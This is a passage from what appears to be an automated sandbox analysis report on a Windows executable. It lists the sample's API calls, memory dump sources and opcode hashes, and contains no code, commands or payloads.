                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                                                                                                                      • GetLastError.KERNEL32 ref: 00405714
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1375471231-0
                                                                                                                      • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                      • Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
                                                                                                                      • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                      • Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                                                      • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocErrorLastVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 497505419-0
                                                                                                                      • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                      • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                                      • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                      • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                                      APIs
                                                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                                        • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FilePointerwsprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 327478801-0
                                                                                                                      • Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                      • Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
                                                                                                                      • Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                      • Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D
                                                                                                                      APIs
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 390214022-0
                                                                                                                      • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                      • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                                      • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                      • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,0000049E,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Open
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 71445658-0
                                                                                                                      • Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                      • Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
                                                                                                                      • Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                      • Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768
                                                                                                                      APIs
                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3934441357-0
                                                                                                                      • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                      • Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
                                                                                                                      • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                      • Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4
                                                                                                                      APIs
                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2738559852-0
                                                                                                                      • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                      • Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
                                                                                                                      • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                      • Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4
                                                                                                                      APIs
                                                                                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProtectVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 544645111-0
                                                                                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                      • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                      • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                                      APIs
                                                                                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      • Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                      • Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
                                                                                                                      • Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                      • Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                      • Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
                                                                                                                      • Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                      • Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08
                                                                                                                      APIs
                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FilePointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 973152223-0
                                                                                                                      • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                      • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                                      • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                      • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                        • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                      • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                                      • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                      • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                      • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                      • CloseClipboard.USER32 ref: 00405676
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                      • String ID: {
                                                                                                                      • API String ID: 590372296-366298937
                                                                                                                      • Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                      • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                      • Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                      • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                      • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 00404727
                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                        • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                        • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\grrezORe7h.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                        • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                        • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\grrezORe7h.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                        • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                        • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                        • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                        • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
